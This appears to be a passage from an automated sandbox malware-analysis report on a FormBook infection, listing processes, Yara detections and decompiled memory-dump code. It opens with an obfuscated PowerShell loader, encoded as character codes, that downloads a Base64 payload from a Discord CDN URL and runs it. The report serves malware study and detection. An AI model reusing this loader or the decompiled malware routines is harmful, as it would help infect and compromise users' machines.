48,70,57,70,49,85,67,54,48,53,48,69,69,57,53,69,53,67,66,48,50,65,53,50,65,48,56,49,56,51,48,54,50,65,54,70,65,65,65,68,48,48,70,57,70,49,85,67,54,48,53,48,69,69,57,53,69,53,67,66,48,50,65,53,50,65,48,56,49,56,51,48,54,50,65,54,70,65,65,65,68,48,48,70,57,70,49,85,67,54,48,53,48,69,69,57,53,69,39,41,59,100,111,32,123,36,112,105,110,103,32,61,32,116,101,115,116,45,99,111,110,110,101,99,116,105,111,110,32,45,99,111,109,112,32,103,111,111,103,108,101,46,99,111,109,32,45,99,111,117,110,116,32,49,32,45,81,117,105,101,116,125,32,117,110,116,105,108,32,40,36,112,105,110,103,41,59,36,66,48,50,65,53,50,65,48,56,49,32,61,32,91,69,110,117,109,93,58,58,84,111,79,98,106,101,99,116,40,91,83,121,115,116,101,109,46,78,101,116,46,83,101,99,117,114,105,116,121,80,114,111,116,111,99,111,108,84,121,112,101,93,44,32,51,48,55,50,41,59,91,83,121,115,116,101,109,46,78,101,116,46,83,101,114,118,105,99,101,80,111,105,110,116,77,97,110,97,103,101,114,93,58,58,83,101,99,117,114,105,116,121,80,114,111,116,111,99,111,108,32,61,32,36,66,48,50,65,53,50,65,48,56,49,59,36,65,68,48,48,70,57,70,49,85,67,61,32,78,101,119,45,79,98,106,101,99,116,32,45,67,111,109,32,77,105,99,114,111,115,111,102,116,46,88,77,76,72,84,84,80,59,36,65,68,48,48,70,57,70,49,85,67,46,111,112,101,110,40,39,71,69,84,39,44,39,104,116,116,112,115,58,47,47,99,100,110,46,100,105,115,99,111,114,100,97,112,112,46,99,111,109,47,97,116,116,97,99,104,109,101,110,116,115,47,57,49,53,51,52,55,56,52,53,55,53,50,55,48,53,49,48,57,47,57,49,53,55,57,57,50,48,54,48,55,50,48,52,53,53,55,56,47,109,46,106,112,103,39,44,36,102,97,108,115,101,41,59,36,65,68,48,48,70,57,70,49,85,67,46,115,101,110,100,40,41,59,36,54,55,52,69,49,54,53,67,56,51,61,91,84,101,120,116,46,69,110,99,111,100,105,110,103,93,58,58,39,85,84,70,56,39,46,39,71,101,116,83,116,114,105,110,103,39,40,91,67,111,110,118,101,114,116,93,58,58,39,70,114,111,109,66,97,115,101,54,52,83,116,114,105,110,103,39,40,36,65,68,48,48,70,57,70,49,85,67,46,114,101,115,112,111,110,115,101,84,101,120,116
,41,41,124,73,96,69,96,88);[System.Text.Encoding]::ASCII.GetString($91534784575270519153478457527051915347845752705191534784575270519153478457527051)|I`E`X
                                                      Imagebase:0x13f920000
                                                      File size:473600 bytes
                                                      MD5 hash:852D67A27E454BD389FA7F02A8CBE23F
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:.Net C# or VB.NET
                                                      Reputation:high

                                                      General

                                                      Start time:18:25:55
                                                      Start date:02/12/2021
                                                      Path:C:\Windows\SysWOW64\calc.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:{path}
                                                      Imagebase:0xa60000
                                                      File size:776192 bytes
                                                      MD5 hash:60B7C0FEAD45F2066E5B805A91F4F0FC
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Yara matches:
                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000B.00000002.541309604.0000000000140000.00000040.00020000.sdmp, Author: Joe Security
                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000B.00000002.541309604.0000000000140000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000B.00000002.541309604.0000000000140000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000B.00000002.541440559.0000000000380000.00000040.00020000.sdmp, Author: Joe Security
                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000B.00000002.541440559.0000000000380000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000B.00000002.541440559.0000000000380000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000B.00000002.541476274.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000B.00000002.541476274.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000B.00000002.541476274.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000B.00000000.486962418.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000B.00000000.486962418.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000B.00000000.486962418.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000B.00000000.487337490.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000B.00000000.487337490.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000B.00000000.487337490.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                      Reputation:moderate

                                                      General

                                                      Start time:18:25:57
                                                      Start date:02/12/2021
                                                      Path:C:\Windows\explorer.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\Explorer.EXE
                                                      Imagebase:0xffa10000
                                                      File size:3229696 bytes
                                                      MD5 hash:38AE1B3C38FAEF56FE4907922F0385BA
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Yara matches:
                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000C.00000000.504387143.00000000099E9000.00000040.00020000.sdmp, Author: Joe Security
                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000C.00000000.504387143.00000000099E9000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000C.00000000.504387143.00000000099E9000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000C.00000000.514319622.00000000099E9000.00000040.00020000.sdmp, Author: Joe Security
                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000C.00000000.514319622.00000000099E9000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000C.00000000.514319622.00000000099E9000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                      Reputation:high

                                                      General

                                                      Start time:18:26:18
                                                      Start date:02/12/2021
                                                      Path:C:\Windows\SysWOW64\cscript.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:C:\Windows\SysWOW64\cscript.exe
                                                      Imagebase:0xb80000
                                                      File size:126976 bytes
                                                      MD5 hash:A3A35EE79C64A640152B3113E6E254E2
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Yara matches:
                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000D.00000002.687433526.0000000000650000.00000040.00020000.sdmp, Author: Joe Security
                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000D.00000002.687433526.0000000000650000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000D.00000002.687433526.0000000000650000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000D.00000002.687211832.0000000000070000.00000040.00020000.sdmp, Author: Joe Security
                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000D.00000002.687211832.0000000000070000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000D.00000002.687211832.0000000000070000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000D.00000002.687509430.0000000000680000.00000004.00000001.sdmp, Author: Joe Security
                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000D.00000002.687509430.0000000000680000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000D.00000002.687509430.0000000000680000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                      Reputation:moderate

                                                      General

                                                      Start time:18:26:22
                                                      Start date:02/12/2021
                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:/c del "C:\WINDOWS\syswow64\calc.exe"
                                                      Imagebase:0x49da0000
                                                      File size:302592 bytes
                                                      MD5 hash:AD7B9C14083B52BC532FBA5948342B98
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high

                                                      Disassembly

                                                      Code Analysis


                                                        Executed Functions

                                                        APIs
                                                        • NtReadFile.NTDLL(rMA,5EB65239,FFFFFFFF,?,?,?,rMA,?,1JA,FFFFFFFF,5EB65239,00414D72,?,00000000), ref: 0041A455
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.541476274.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                        Yara matches
                                                        Similarity
                                                        • API ID: FileRead
                                                        • String ID: 1JA$rMA$rMA
                                                        • API String ID: 2738559852-782607585
                                                        • Opcode ID: 51fdd5af026d6288b84a79521390282caee80f4da8fb3eaccbeb81e4e2d7e8ac
                                                        • Instruction ID: 11b7dea4e4b245aed764eb1a0e7efbb34c8d6c43397d0661aa51e9aeef63cc21
                                                        • Opcode Fuzzy Hash: 51fdd5af026d6288b84a79521390282caee80f4da8fb3eaccbeb81e4e2d7e8ac
                                                        • Instruction Fuzzy Hash: ED21F2B6204108AFCB08DF99DC90DEB73A9EF8C714B15865AFE0D97241D634E8528BA5
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        C-Code - Quality: 37%
                                                        			E0041A410(intOrPtr _a4, char _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, char _a32, intOrPtr _a36, char _a40) {
                                                        				void* _t18;
                                                        				void* _t27;
                                                        				intOrPtr* _t28;
                                                        
                                                        				_t13 = _a4;
                                                        				_t28 = _a4 + 0xc48;
                                                        				E0041AF60(_t27, _t13, _t28,  *((intOrPtr*)(_t13 + 0x10)), 0, 0x2a);
                                                        				_t4 =  &_a40; // 0x414a31
                                                        				_t6 =  &_a32; // 0x414d72
                                                        				_t12 =  &_a8; // 0x414d72
                                                        				_t18 =  *((intOrPtr*)( *_t28))( *_t12, _a12, _a16, _a20, _a24, _a28,  *_t6, _a36,  *_t4); // executed
                                                        				return _t18;
                                                        			}







                                                        APIs
                                                        • NtReadFile.NTDLL(rMA,5EB65239,FFFFFFFF,?,?,?,rMA,?,1JA,FFFFFFFF,5EB65239,00414D72,?,00000000), ref: 0041A455
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.541476274.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                        Yara matches
                                                        Similarity
                                                        • API ID: FileRead
                                                        • String ID: 1JA$rMA$rMA
                                                        • API String ID: 2738559852-782607585
                                                        • Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                                        • Instruction ID: c6e97d42c3e85b78cd3a41c20c82dd28da71633a8e67c8174f08c115ef6e08ba
                                                        • Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                                        • Instruction Fuzzy Hash: 87F0B7B2200208AFCB14DF89DC81EEB77ADEF8C754F158249BE1D97241D630E851CBA4
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        C-Code - Quality: 100%
                                                        			E0040ACF0(void* __eflags, void* _a4, intOrPtr _a8) {
                                                        				char* _v8;
                                                        				struct _EXCEPTION_RECORD _v12;
                                                        				struct _OBJDIR_INFORMATION _v16;
                                                        				char _v536;
                                                        				void* _t15;
                                                        				struct _OBJDIR_INFORMATION _t17;
                                                        				struct _OBJDIR_INFORMATION _t18;
                                                        				void* _t30;
                                                        				void* _t31;
                                                        				void* _t32;
                                                        
                                                        				_v8 =  &_v536;
                                                        				_t15 = E0041CC50( &_v12, 0x104, _a8);
                                                        				_t31 = _t30 + 0xc;
                                                        				if(_t15 != 0) {
                                                        					_t17 = E0041D070(__eflags, _v8);
                                                        					_t32 = _t31 + 4;
                                                        					__eflags = _t17;
                                                        					if(_t17 != 0) {
                                                        						E0041D2F0( &_v12, 0);
                                                        						_t32 = _t32 + 8;
                                                        					}
                                                        					_t18 = E0041B4A0(_v8);
                                                        					_v16 = _t18;
                                                        					__eflags = _t18;
                                                        					if(_t18 == 0) {
                                                        						LdrLoadDll(0, 0,  &_v12,  &_v16); // executed
                                                        						return _v16;
                                                        					}
                                                        					return _t18;
                                                        				} else {
                                                        					return _t15;
                                                        				}
                                                        			}














                                                        APIs
                                                        • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0040AD62
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.541476274.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Load
                                                        • String ID:
                                                        • API String ID: 2234796835-0
                                                        • Opcode ID: dc2098e385e942efcd48a296202403441f5905bb34daa24398974f8d6af8945c
                                                        • Instruction ID: bd03027937dafe21d6f438616a486266aae6a772261e1344982784e00def1180
                                                        • Opcode Fuzzy Hash: dc2098e385e942efcd48a296202403441f5905bb34daa24398974f8d6af8945c
                                                        • Instruction Fuzzy Hash: 80015EB5E0020DBBDF10DBA1DC42FDEB3789F54308F0045AAA908A7281F634EB548B95
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • NtCreateFile.NTDLL(00000060,00409CF3,?,00414BB7,00409CF3,FFFFFFFF,?,?,FFFFFFFF,00409CF3,00414BB7,?,00409CF3,00000060,00000000,00000000), ref: 0041A3AD
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.541476274.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                        Yara matches
                                                        Similarity
                                                        • API ID: CreateFile
                                                        • String ID:
                                                        • API String ID: 823142352-0
                                                        • Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                                        • Instruction ID: 1571a74e51eef41835f20cf1113afde9e84efeac6e640e2865a3d9423fa4fe5b
                                                        • Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                                        • Instruction Fuzzy Hash: FEF0BDB2201208ABCB08CF89DC85EEB77ADAF8C754F158248BA0D97241C630E8518BA4
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        C-Code - Quality: 100%
                                                        			E0041A48A(void* __eflags, void* _a4, void* _a8, void* _a12, void* _a16, void* _a20) {
                                                        
                                                        				if (__eflags > 0) goto L3;
                                                        			}




                                                        APIs
                                                        • NtClose.NTDLL(00414D50,?,?,00414D50,00409CF3,FFFFFFFF), ref: 0041A4B5
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.541476274.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Close
                                                        • String ID:
                                                        • API String ID: 3535843008-0
                                                        • Opcode ID: ae70898eeba45950c950b20f57446945f3c6375c956b339253ca8bdc1beeb993
                                                        • Instruction ID: 250678ca2aebfc1960b203ee31a1614b0516f2d1367de9df9d74293b1b664355
                                                        • Opcode Fuzzy Hash: ae70898eeba45950c950b20f57446945f3c6375c956b339253ca8bdc1beeb993
                                                        • Instruction Fuzzy Hash: 8AF05EB6200114ABD720EF98DC80EEB73A9EF88720F248559FA0C9B241C634E91187A0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        C-Code - Quality: 100%
                                                        			E0041A540(intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
                                                        				long _t14;
                                                        				void* _t21;
                                                        
                                                        				_t3 = _a4 + 0xc60; // 0xca0
                                                        				E0041AF60(_t21, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x30);
                                                        				_t14 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
                                                        				return _t14;
                                                        			}






                                                        APIs
                                                        • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,0041B134,?,00000000,?,00003000,00000040,00000000,00000000,00409CF3), ref: 0041A579
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.541476274.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                        Yara matches
                                                        Similarity
                                                        • API ID: AllocateMemoryVirtual
                                                        • String ID:
                                                        • API String ID: 2167126740-0
                                                        • Opcode ID: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                                        • Instruction ID: 60dc777ab2a5703fe93ec60752bbea5a413bae98553eb5929f98badcd8fbe991
                                                        • Opcode Fuzzy Hash: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                                        • Instruction Fuzzy Hash: B2F015B2200208ABCB14DF89CC81EEB77ADEF8C754F158149BE0897241C630F811CBA4
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • NtClose.NTDLL(00414D50,?,?,00414D50,00409CF3,FFFFFFFF), ref: 0041A4B5
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.541476274.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Close
                                                        • String ID:
                                                        • API String ID: 3535843008-0
                                                        • Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                                        • Instruction ID: a008c5d5ec14fa9f5013d94ab86a46559dd82bf248144eb087863a0ac6a31d62
                                                        • Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                                        • Instruction Fuzzy Hash: F7D01776200218ABD710EB99CC85EE77BACEF48B64F158499BA1C9B242C530FA1086E0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.541893417.0000000000B30000.00000040.00000001.sdmp, Offset: 00B20000, based on PE: true
                                                        • Associated: 0000000B.00000002.541859378.0000000000B20000.00000040.00000001.sdmp
                                                        • Associated: 0000000B.00000002.542443702.0000000000C10000.00000040.00000001.sdmp
                                                        • Associated: 0000000B.00000002.542456721.0000000000C20000.00000040.00000001.sdmp
                                                        • Associated: 0000000B.00000002.542476481.0000000000C24000.00000040.00000001.sdmp
                                                        • Associated: 0000000B.00000002.542501441.0000000000C27000.00000040.00000001.sdmp
                                                        • Associated: 0000000B.00000002.542519253.0000000000C30000.00000040.00000001.sdmp
                                                        • Associated: 0000000B.00000002.542572972.0000000000C90000.00000040.00000001.sdmp
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID:
                                                        • API String ID: 2994545307-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID:
                                                        • API String ID: 2994545307-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID:
                                                        • API String ID: 2994545307-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID:
                                                        • API String ID: 2994545307-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID:
                                                        • API String ID: 2994545307-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID:
                                                        • API String ID: 2994545307-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID:
                                                        • API String ID: 2994545307-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID:
                                                        • API String ID: 2994545307-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID:
                                                        • API String ID: 2994545307-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID:
                                                        • API String ID: 2994545307-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID:
                                                        • API String ID: 2994545307-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID:
                                                        • API String ID: 2994545307-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID:
                                                        • API String ID: 2994545307-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID:
                                                        • API String ID: 2994545307-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.541893417.0000000000B30000.00000040.00000001.sdmp, Offset: 00B20000, based on PE: true
                                                        • Associated: 0000000B.00000002.541859378.0000000000B20000.00000040.00000001.sdmp
                                                        • Associated: 0000000B.00000002.542443702.0000000000C10000.00000040.00000001.sdmp
                                                        • Associated: 0000000B.00000002.542456721.0000000000C20000.00000040.00000001.sdmp
                                                        • Associated: 0000000B.00000002.542476481.0000000000C24000.00000040.00000001.sdmp
                                                        • Associated: 0000000B.00000002.542501441.0000000000C27000.00000040.00000001.sdmp
                                                        • Associated: 0000000B.00000002.542519253.0000000000C30000.00000040.00000001.sdmp
                                                        • Associated: 0000000B.00000002.542572972.0000000000C90000.00000040.00000001.sdmp
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID:
                                                        • API String ID: 2994545307-0
                                                        • Opcode ID: 3f3d7aa38811b8d75e7f035be4e9a31914adf6f2f9842a42369159ae9521bbbf
                                                        • Instruction ID: 9b30904a3bfeb6814e26683714e5c097bc05a41d35c26203adaeaac906fc0f52
                                                        • Opcode Fuzzy Hash: 3f3d7aa38811b8d75e7f035be4e9a31914adf6f2f9842a42369159ae9521bbbf
                                                        • Instruction Fuzzy Hash: C9B01272100580C7E34EA714D906B4B7210FB80F00F408A3AA00781891DB789B2CD98A
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.541893417.0000000000B30000.00000040.00000001.sdmp, Offset: 00B20000, based on PE: true
                                                        • Associated: 0000000B.00000002.541859378.0000000000B20000.00000040.00000001.sdmp
                                                        • Associated: 0000000B.00000002.542443702.0000000000C10000.00000040.00000001.sdmp
                                                        • Associated: 0000000B.00000002.542456721.0000000000C20000.00000040.00000001.sdmp
                                                        • Associated: 0000000B.00000002.542476481.0000000000C24000.00000040.00000001.sdmp
                                                        • Associated: 0000000B.00000002.542501441.0000000000C27000.00000040.00000001.sdmp
                                                        • Associated: 0000000B.00000002.542519253.0000000000C30000.00000040.00000001.sdmp
                                                        • Associated: 0000000B.00000002.542572972.0000000000C90000.00000040.00000001.sdmp
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID:
                                                        • API String ID: 2994545307-0
                                                        • Opcode ID: 4dddc10ebfa889a6a675612f7993cc76823eb4169e77ac0f74568cd9575660f9
                                                        • Instruction ID: 7e2af0442ae64c9f6bb8df8c94f4cb17495a0f0e8e42cafe04a2b86fa0e4786e
                                                        • Opcode Fuzzy Hash: 4dddc10ebfa889a6a675612f7993cc76823eb4169e77ac0f74568cd9575660f9
                                                        • Instruction Fuzzy Hash: A2B012B2104580C7E3099714D906F4B7210FB90F00F40893EA00F81851DB3CD92CD44A
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        C-Code - Quality: 93%
                                                        			E00409AB0(intOrPtr _a4) {
                                                        				intOrPtr _v8;
                                                        				char _v24;
                                                        				char _v284;
                                                        				char _v804;
                                                        				char _v840;
                                                        				void* _t24;
                                                        				void* _t31;
                                                        				void* _t33;
                                                        				void* _t34;
                                                        				void* _t39;
                                                        				void* _t50;
                                                        				intOrPtr _t52;
                                                        				void* _t53;
                                                        				void* _t54;
                                                        				void* _t55;
                                                        				void* _t56;
                                                        
                                                        				_t52 = _a4;
                                                        				_t39 = 0; // executed
                                                        				_t24 = E00407EA0(_t52,  &_v24); // executed
                                                        				_t54 = _t53 + 8;
                                                        				if(_t24 != 0) {
                                                        					E004080B0( &_v24,  &_v840);
                                                        					_t55 = _t54 + 8;
                                                        					do {
                                                        						E0041BE10( &_v284, 0x104);
                                                        						E0041C480( &_v284,  &_v804);
                                                        						_t56 = _t55 + 0x10;
                                                        						_t50 = 0x4f;
                                                        						while(1) {
                                                        							_t31 = E00414DF0(E00414D90(_t52, _t50),  &_v284);
                                                        							_t56 = _t56 + 0x10;
                                                        							if(_t31 != 0) {
                                                        								break;
                                                        							}
                                                        							_t50 = _t50 + 1;
                                                        							if(_t50 <= 0x62) {
                                                        								continue;
                                                        							} else {
                                                        							}
                                                        							goto L8;
                                                        						}
                                                        						_t9 = _t52 + 0x14; // 0xffffe045
                                                        						 *(_t52 + 0x474) =  *(_t52 + 0x474) ^  *_t9;
                                                        						_t39 = 1;
                                                        						L8:
                                                        						_t33 = E004080E0( &_v24,  &_v840);
                                                        						_t55 = _t56 + 8;
                                                        					} while (_t33 != 0 && _t39 == 0);
                                                        					_t34 = E00408160(_t52,  &_v24); // executed
                                                        					if(_t39 == 0) {
                                                        						asm("rdtsc");
                                                        						asm("rdtsc");
                                                        						_v8 = _t34 - 0 + _t34;
                                                        						 *((intOrPtr*)(_t52 + 0x55c)) =  *((intOrPtr*)(_t52 + 0x55c)) + 0xffffffba;
                                                        					}
                                                        					 *((intOrPtr*)(_t52 + 0x31)) =  *((intOrPtr*)(_t52 + 0x31)) + _t39;
                                                        					_t20 = _t52 + 0x31; // 0x5608758b
                                                        					 *((intOrPtr*)(_t52 + 0x32)) =  *((intOrPtr*)(_t52 + 0x32)) +  *_t20 + 1;
                                                        					return 1;
                                                        				} else {
                                                        					return _t24;
                                                        				}
                                                        			}




















                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.541476274.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                        Yara matches
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: bf70d19deb8b7dbf65a1c14f2d3141162741e3067e6603a799ea80fa30cdc1c2
                                                        • Instruction ID: 0b46cc9625fd597f0f1293e0fe630cc8c1f9f1e3f005c30533d49d025d22dd75
                                                        • Opcode Fuzzy Hash: bf70d19deb8b7dbf65a1c14f2d3141162741e3067e6603a799ea80fa30cdc1c2
                                                        • Instruction Fuzzy Hash: 97210AB2D4020857CB25D674AD52BFF73BCAB54314F04007FE949A3182F638BE498BA5
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        C-Code - Quality: 100%
                                                        			E0041A630(intOrPtr _a4, char _a8, long _a12, long _a16) {
                                                        				void* _t10;
                                                        				void* _t15;
                                                        
                                                        				E0041AF60(_t15, _a4, _a4 + 0xc70,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x34);
                                                        				_t6 =  &_a8; // 0x414536
                                                        				_t10 = RtlAllocateHeap( *_t6, _a12, _a16); // executed
                                                        				return _t10;
                                                        			}






                                                        APIs
                                                        • RtlAllocateHeap.NTDLL(6EA,?,00414CAF,00414CAF,?,00414536,?,?,?,?,?,00000000,00409CF3,?), ref: 0041A65D
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.541476274.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                        Yara matches
                                                        Similarity
                                                        • API ID: AllocateHeap
                                                        • String ID: 6EA
